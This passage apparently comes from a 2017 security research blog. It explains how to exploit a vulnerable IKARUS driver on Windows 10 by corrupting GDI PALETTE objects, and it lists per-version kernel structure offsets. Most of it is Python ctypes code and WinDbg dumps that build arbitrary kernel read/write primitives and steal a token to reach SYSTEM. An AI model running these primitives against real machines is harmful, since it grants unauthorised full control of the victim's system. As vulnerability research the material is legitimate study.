palette_1_address + cEntries + 3

Here cEntries stands for the offset of that field, which is always 0x1c, and the number of entries is stored in 4 bytes (32 bits). The +3 is needed in order to overwrite the high-order byte, since the value is stored little-endian. If we look at a dump, this is what we get after the overwrite:

0: kd> dd ffffe5b784730000
ffffe5b7`84730000  9c080a13 ffffffff 00000000 00000000
ffffe5b7`84730010  5fe03700 ffffad0d 00000501 110003de
ffffe5b7`84730020  0006e3f4 00000000 00000000 00000000
ffffe5b7`84730030  00000000 00000000 00000000 00000000
ffffe5b7`84730040  00000000 00000000 00000000 00000000
ffffe5b7`84730050  00000000 00000000 00000000 00000000
ffffe5b7`84730060  00000002 00000001 00000000 00000000
ffffe5b7`84730070  00000000 00000000 84730088 ffffe5b7

This effectively increases the size of the palette to 0x110003de * 4 (from 0x000003de * 4) as one palette entry takes 4 bytes. This should be sufficient to get an overlap with palette2.

As for code:
outputbuffer = palette_1_address + 0x1c + 3
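
To see why the +3 matters, here is a small offline sketch that replays the one-byte write on a plain byte buffer. Nothing in it touches the kernel; the buffer and the helper name apply_0x11_write are made up for illustration, while the 0x1c offset and the 0x3de entry count are taken from the dump above.

```python
import struct

CENTRIES_OFFSET = 0x1c  # offset of cEntries inside the PALETTE object


def apply_0x11_write(obj, offset):
    """Mimic the vulnerability: store the single byte 0x11 at obj[offset]."""
    patched = bytearray(obj)
    patched[offset] = 0x11
    return patched


# Hypothetical stand-in for the start of a palette: zeros, with cEntries = 0x3de
palette = bytearray(0x30)
struct.pack_into("<I", palette, CENTRIES_OFFSET, 0x3de)

# Hitting the high-order byte (offset + 3) enlarges the palette
patched = apply_0x11_write(palette, CENTRIES_OFFSET + 3)
new_centries = struct.unpack_from("<I", patched, CENTRIES_OFFSET)[0]
print(hex(new_centries))      # 0x110003de
print(hex(new_centries * 4))  # 0x44000f78 bytes covered by the entries

# Hitting the low-order byte (offset + 0) would shrink it instead
shrunk = apply_0x11_write(palette, CENTRIES_OFFSET)
low_centries = struct.unpack_from("<I", shrunk, CENTRIES_OFFSET)[0]
print(hex(low_centries))      # 0x311
```

Because the field is little-endian, only the write at offset 0x1c + 3 guarantees a larger count, whatever the original low bytes were.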

The third step is to overwrite the other palette’s pFirstColor pointer and point it to the memory address of palette1’s pFirstColor. That address is easy to get: we just add the proper offset to palette1’s address, which is 0x78 or 0x80 depending on the platform (as of this writing). How do we overwrite palette2’s pFirstColor pointer? We need to calculate its distance from palette1’s first entry. The calculation is:

distance = (palette_2_address + pFirstColor_offset) - (palette_1_address + apalColors_offset)

In words: we take the memory location of the target (palette_2_address + pFirstColor_offset) and subtract the memory location of the very first entry of palette1 (palette_1_address + apalColors_offset). On x64, apalColors_offset is pFirstColor_offset + 0x10. We divide this distance by 4 (remember, with palettes one entry is 4 bytes) to get the right index (iStart) to use with the SetPaletteEntries function. Code:

address = c_ulonglong(palette_1_pFirstColor)
gdi32.SetPaletteEntries(palette_1_handle, distance // 4, sizeof(address) // 4, addressof(address))
manager_palette_handle = palette_2_handle
worker_palette_handle = palette_1_handle
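
As a worked example of the index calculation, the sketch below uses two made-up palette addresses and the v1607+ offsets (0x78 / 0x88). The helper name palette_index_for and both addresses are assumptions for illustration only; the arithmetic is the one described above.

```python
def palette_index_for(target_address, entries_base):
    """Return the SetPaletteEntries start index that lands on target_address."""
    distance = target_address - entries_base
    if distance < 0:
        raise ValueError("target lies below the enlarged palette; swap the palettes")
    if distance % 4:
        raise ValueError("target is not aligned to a 4-byte palette entry")
    return distance // 4


# Hypothetical addresses, only for illustration
palette_1_address = 0xffffe5b784730000
palette_2_address = 0xffffe5b784735000
pFirstColor_offset = 0x78
apalColors_offset = 0x88

index = palette_index_for(palette_2_address + pFirstColor_offset,
                          palette_1_address + apalColors_offset)
print(hex(index))  # 0x13fc
```

The negative-distance check covers the case mentioned earlier, where palette1 does not end up at the lower address.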

At this stage I ran into a problem where my code started to overwrite random memory locations, regardless of what the distance was (at least this is how it looked). I was pretty sure I was right, and for hours I had no idea what was going wrong. Finally I found it: SetPaletteEntries expects an unsigned INT for the iStart index. I didn’t convert the distance to UINT, so it was passed as a signed INT, and as it was quite large, it pointed to a different place than I expected. This was a good lesson for later: I need to watch out for correct ctypes conversions. So the above line should correctly be:

gdi32.SetPaletteEntries(palette_1_handle, c_uint(distance // 4), sizeof(address) // 4, addressof(address))
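
The signed / unsigned difference can be reproduced without any Windows API. This is only a sketch of the general effect, with a made-up index value, and it assumes a platform where a C int is 32 bits; it does not claim to replay the exact values from the exploit.

```python
from ctypes import c_int, c_uint

index = 0x90000000  # hypothetical start index above 0x7fffffff

# Same 32-bit pattern, two interpretations
print(c_int(index).value)        # -1879048192
print(hex(c_uint(index).value))  # 0x90000000
```

Wrapping the argument in c_uint, as in the corrected line, keeps the intended value. Declaring argtypes on the ctypes function object is another way to make the conversion explicit.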

Once this is done, the only thing remaining is to perform token stealing with palettes. Up until this point the entire exploit runs from low integrity mode as well. The token stealing won’t, because of the way it’s implemented, but I will look for something else later on.

tokenstealing_with_palettes(manager_palette_handle, worker_palette_handle)

I think the above idea can be easily generalised for similar cases, when we can control the memory location of the overwrite, but not the content. If we can increase the size of a palette, we can gain full read / write.

If you want to play with this, the following happens to be an IKARUS 2.6.15 installer, which is vulnerable:

The above exploit is uploaded here:
It doesn't always work on the first try, but run it a few times, and eventually you will get SYSTEM.

UPDATE 2017.11.25.:

With the new release of kex, this exploit can work entirely from low integrity mode.

Tuesday, October 31, 2017

Abusing GDI objects for kernel exploitation - PALETTE and various offsets

I started to dig into the topic of abusing GDI objects for Windows kernel exploitation about two weeks ago, and finally got to PALETTEs. There is plenty of documentation about BITMAPs, so I don’t really want to write about those, but there have been few write-ups about PALETTEs. There are three that I relied on during my research:

I decided to implement PALETTE read / write primitives for my kex Python library, and this post is about how I did that. Basically we need the following info:
  1. What is their size and offset?
  2. How to create them?
  3. How to read / write with them?
Every document I read showed the following structure outline:

typedef struct _PALETTE64
{
    BASEOBJECT64      BaseObject;    // 0x00
    FLONG             flPal;         // 0x18
    ULONG32           cEntries;      // 0x1C
    ULONG32           ulTime;        // 0x20
    HDC               hdcHead;       // 0x24
    ULONG64           hSelected;     // 0x28
    ULONG64           cRefhpal;      // 0x30
    ULONG64           cRefRegular;   // 0x34
    ULONG64           ptransFore;    // 0x3c
    ULONG64           ptransCurrent; // 0x44
    ULONG64           ptransOld;     // 0x4C
    ULONG32           unk_038;       // 0x38
    ULONG64           pfnGetNearest; // 0x3c
    ULONG64           pfnGetMatch;   // 0x40
    ULONG64           ulRGBTime;     // 0x44
    ULONG64           pRGBXlate;     // 0x48
    PALETTEENTRY      *pFirstColor;  // 0x80
    struct _PALETTE   *ppalThis;     // 0x88
    PALETTEENTRY      apalColors[3]; // 0x90
} PALETTE64;

What is important from this is the size of the structure header, which is 0x90 (the offset of the PALETTEENTRY array), and the offset of pFirstColor, which points to the array; this is the pointer that needs to be overwritten to get the read / write primitives. It is at offset 0x80 in all the documentation I have seen so far, and what you can read everywhere is that this technique works up to Windows 10 v1709 (RS3), and maybe even later, but we don’t know that yet.

The size of the entire object without the POOL_HEADER is basically this PALETTE64 structure + the PALETTEENTRY array. One PALETTEENTRY is 4 bytes as we can see (this will be important later):

from ctypes import Structure
from ctypes.wintypes import BYTE

class PALETTEENTRY(Structure):
    _fields_ = [
        ("peRed", BYTE),
        ("peGreen", BYTE),
        ("peBlue", BYTE),
        ("peFlags", BYTE),
    ]

There is a nice implementation made by Sebastian Apelt from Siberas (see the link above), which I also used as my base in my Python implementation. To create a PALETTE, there is a simple API call:

HPALETTE CreatePalette(
  _In_ const LOGPALETTE *lplgpl
);

where LOGPALETTE looks like this:

class LOGPALETTE(Structure):
    _fields_ = [
        ("palVersion", WORD),
        ("palNumEntries", WORD),
        ("palPalEntry", PALETTEENTRY * 1),  # PALETTEENTRY palPalEntry[1] in the Win32 definition
    ]

So essentially, to create a PALETTE we need to calculate the size, populate the structure, and call the API, something like this:

pal_cnt = (size - palette_entries_offset) // 4
lPalette = LOGPALETTE()
lPalette.palNumEntries = pal_cnt
lPalette.palVersion = 0x300
palette_handle = gdi32.CreatePalette(byref(lPalette))

As the PALETTEENTRY is 4 bytes, we need to calculate the proper number of entries required for us to reserve the proper size.
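
A quick worked example of that calculation, as a sketch: the helper name palette_entry_count is made up, 0x90 is the header size from the structure outline above, and 0x88 is the header size that turns out to apply from v1607 on (see further down in this post).

```python
ENTRY_SIZE = 4  # sizeof(PALETTEENTRY)


def palette_entry_count(object_size, palette_entries_offset):
    """Number of PALETTEENTRYs needed so the whole object is object_size bytes."""
    payload = object_size - palette_entries_offset
    if payload < 0 or payload % ENTRY_SIZE:
        raise ValueError("size does not fit a whole number of entries")
    return payload // ENTRY_SIZE


print(hex(palette_entry_count(0x1000, 0x90)))  # 0x3dc
print(hex(palette_entry_count(0x1000, 0x88)))  # 0x3de
```

The second result, 0x3de, is the cEntries value visible at offset 0x1c in the WinDbg dumps in these posts, where the object is 0x1000 bytes.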

Once we have this, and once we have overwritten the manager palette’s pFirstColor pointer, we can start to read / write. To perform these actions we can use the following functions.

UINT GetPaletteEntries(
  _In_  HPALETTE       hpal,
  _In_  UINT           iStartIndex,
  _In_  UINT           nEntries,
  _Out_ LPPALETTEENTRY lppe
);

UINT SetPaletteEntries(
  _In_       HPALETTE     hpal,
  _In_       UINT         iStart,
  _In_       UINT         cEntries,
  _In_ const PALETTEENTRY *lppe
);

These can be used just as we used GetBitmapBits / SetBitmapBits. There is one important difference: here we tell the function to read X number of PALETTEENTRYs, each of which is 4 bytes long. This means that if we want to read 8 bytes (an address on x64), we need to pass the value 2, i.e. the size divided by 4. That’s it; after that it’s essentially the same. Here is my Python implementation:

def set_address_palette(manager_palette_handle, address):
    # Point the worker's pFirstColor at `address` through the manager palette
    address = c_ulonglong(address)
    gdi32.SetPaletteEntries(manager_palette_handle, 0, sizeof(address) // 4, addressof(address))

def write_memory_palette(manager_palette_handle, worker_palette_handle, dst, src, len):
    # Write len bytes from the src buffer to the kernel address dst
    set_address_palette(manager_palette_handle, dst)
    gdi32.SetPaletteEntries(worker_palette_handle, 0, len // 4, src)

def read_memory_palette(manager_palette_handle, worker_palette_handle, src, dst, len):
    # Read len bytes from the kernel address src into the dst buffer
    set_address_palette(manager_palette_handle, src)
    gdi32.GetPaletteEntries(worker_palette_handle, 0, len // 4, dst)

And basically that’s it; this works essentially the same way as with BITMAPs. You can leak the kernel address of the object with Window objects, just as we did with BITMAPs, on Win10 v1703 (or earlier). This leak also works on Win10 v1709.
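
For readers who want to see the manager / worker mechanics without a kernel debugger, here is a toy simulation in pure Python. Everything in it is an assumption made for illustration: kernel memory is a flat bytearray, a palette is identified by the address of its pFirstColor field, and ToyKernel, MANAGER and WORKER are invented names. It only models the pointer redirection, not GDI itself.

```python
import struct

ENTRY_SIZE = 4  # one PALETTEENTRY is 4 bytes


class ToyKernel:
    """Flat byte array standing in for kernel memory (pure simulation)."""

    def __init__(self, size=0x400):
        self.mem = bytearray(size)

    def _entries_base(self, palette):
        # A palette is identified by the address of its pFirstColor field.
        return struct.unpack_from("<Q", self.mem, palette)[0]

    def set_palette_entries(self, palette, start, count, data):
        base = self._entries_base(palette) + start * ENTRY_SIZE
        self.mem[base:base + count * ENTRY_SIZE] = data[:count * ENTRY_SIZE]

    def get_palette_entries(self, palette, start, count):
        base = self._entries_base(palette) + start * ENTRY_SIZE
        return bytes(self.mem[base:base + count * ENTRY_SIZE])


MANAGER = 0x10  # address of the manager's pFirstColor field (made up)
WORKER = 0x20   # address of the worker's pFirstColor field (made up)

kernel = ToyKernel()
# State after the corruption: manager.pFirstColor -> worker's pFirstColor field
struct.pack_into("<Q", kernel.mem, MANAGER, WORKER)


def set_address(address):
    # Writing 2 entries (8 bytes) through the manager retargets the worker
    kernel.set_palette_entries(MANAGER, 0, 8 // ENTRY_SIZE, struct.pack("<Q", address))


def write_memory(dst, data):
    set_address(dst)
    kernel.set_palette_entries(WORKER, 0, len(data) // ENTRY_SIZE, data)


def read_memory(src, length):
    set_address(src)
    return kernel.get_palette_entries(WORKER, 0, length // ENTRY_SIZE)


write_memory(0x200, b"\xef\xbe\xad\xde\x00\x00\x00\x00")
print(read_memory(0x200, 8).hex())  # efbeadde00000000
```

The manager never touches the target directly; it only rewrites where the worker's entries live, and the worker then does the actual read or write.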

Wish everything was so simple!

So I started to test this on Win10 v1511, and it worked on the first try! Nice! I was happy :) It took some time to build a Win10 v1709 machine, so I went ahead and ran the same exploit on Win10 v1607, and... BSOD! I ran it again, and got a BSOD again with POOL corruption. So I started to dig into what was going on, as I was pretty sure I was overwriting something wrong. Notice the problem?

0: kd> dc ffff89c9c4611000
ffff89c9`c4611000  7e08083b 00000000 00000000 00000000  ;..~............
ffff89c9`c4611010  d9c0a080 ffff910b 00000501 000003de  ................
ffff89c9`c4611020  00003868 00000000 00000000 00000000  h8..............
ffff89c9`c4611030  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611040  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611050  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611060  00000002 00000001 00000000 00000000  ................
ffff89c9`c4611070  00000000 00000000 c4611088 ffff89c9  ..........a.....
ffff89c9`c4611080  c4611000 ffff89c9 00000000 00000000  ................

0: kd> !pool ffff89c9c4611000
Pool page ffff89c9c4611000 region is Unknown
ffff89c9c4611000 is not a valid large pool allocation, checking large session pool...
*ffff89c9c4611000 : large page allocation, tag is Gh08, size is 0x1010 bytes
  Pooltag Gh08 : GDITAG_HMGR_PAL_TYPE, Binary : win32k.sys

So this is the end of the PALETTE64 structure:

    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

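This doesn’t align with the WinDbg dump: there, the pointer at offset 0x78 (ffff89c9`c4611088) points into the object itself at offset 0x88, and the pointer at 0x80 (ffff89c9`c4611000) points back to the start of the object. So it turns out the new offsets are: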

    PALETTEENTRY    *pFirstColor;  // 0x78
    struct _PALETTE *ppalThis;     // 0x80
    PALETTEENTRY    apalColors[3]; // 0x88

I didn’t check what is missing or what became smaller, but from Win10 v1607 this is the correct offset, including v1709.
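
The new offsets can be double-checked directly from the dump. The sketch below re-packs the two dump rows at 0x70 and 0x80 and reads them back as 64-bit pointers; the values are copied from the WinDbg output above, and the helper name qword_at is made up.

```python
import struct

BASE = 0xffff89c9c4611000  # object address from the dump

# dwords copied from the dump rows at offsets 0x70 and 0x80
ROW_70 = [0x00000000, 0x00000000, 0xc4611088, 0xffff89c9]
ROW_80 = [0xc4611000, 0xffff89c9, 0x00000000, 0x00000000]

raw = struct.pack("<8I", *(ROW_70 + ROW_80))


def qword_at(offset):
    """Read the little-endian 64-bit value at an object-relative offset."""
    return struct.unpack_from("<Q", raw, offset - 0x70)[0]


print(hex(qword_at(0x78) - BASE))  # 0x88: pFirstColor points at apalColors
print(qword_at(0x80) == BASE)      # True: ppalThis points back to the object
```

So pFirstColor sits at 0x78 and the entries start at 0x88 in this dump.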

Sweet, so now that is fixed, I got this working on v1607 and v1703, but it broke on v1709! It didn’t BSOD but I couldn’t leak the address anymore! What? Everyone said it works! Ok, let’s see the Window leak. The offsets changed there at version v1703, so there was a good chance they did again on v1709. Essentially:

Windows 10 x64 v1607 and earlier (only tested back to v1511, not sure about Win8 or 7):
pcls = 0x98
lpszMenuNameOffset = 0x88

Windows 10 x64 v1703:
pcls = 0xa8
lpszMenuNameOffset = 0x90

Windows 10 x64 v1709:
pcls = 0xa8
lpszMenuNameOffset = 0x98

Once I fixed these as well, all started to work.
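
One simple way to keep such values in one place is a lookup table keyed by release. This is only a sketch built from the offsets mentioned in this post, not necessarily how kex organises them; the names OFFSETS and offsets_for are made up.

```python
# Offsets collected from this post; keys are Windows 10 x64 release names.
OFFSETS = {
    "v1511": {"pFirstColor": 0x80, "apalColors": 0x90, "pcls": 0x98, "lpszMenuNameOffset": 0x88},
    "v1607": {"pFirstColor": 0x78, "apalColors": 0x88, "pcls": 0x98, "lpszMenuNameOffset": 0x88},
    "v1703": {"pFirstColor": 0x78, "apalColors": 0x88, "pcls": 0xa8, "lpszMenuNameOffset": 0x90},
    "v1709": {"pFirstColor": 0x78, "apalColors": 0x88, "pcls": 0xa8, "lpszMenuNameOffset": 0x98},
}


def offsets_for(version):
    """Return the offset dictionary for a release, or fail loudly."""
    try:
        return OFFSETS[version]
    except KeyError:
        raise ValueError("no offsets recorded for %s" % version)


print(hex(offsets_for("v1709")["lpszMenuNameOffset"]))  # 0x98
```

Failing loudly on an unknown release is deliberate: guessing an offset in kernel memory usually ends in a BSOD.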

I checked and the structure offsets required for token stealing didn’t change, so essentially that was all.

Structure offsets change too often, and sometimes it’s not easy to track them down. This is one of the reasons I’m building 'kex' and hardcoding all these offsets, so I can write OS-independent exploits. With the current version you can call these functions on the Win10 x64 versions above and get them to work reliably. Link: GitHub - theevilbit/kex

In order to make it easier for people contributing to offsets, and also make it easier for those, who want to code the same in different languages, I’m starting an offset table on the same GitHub repo. Directly: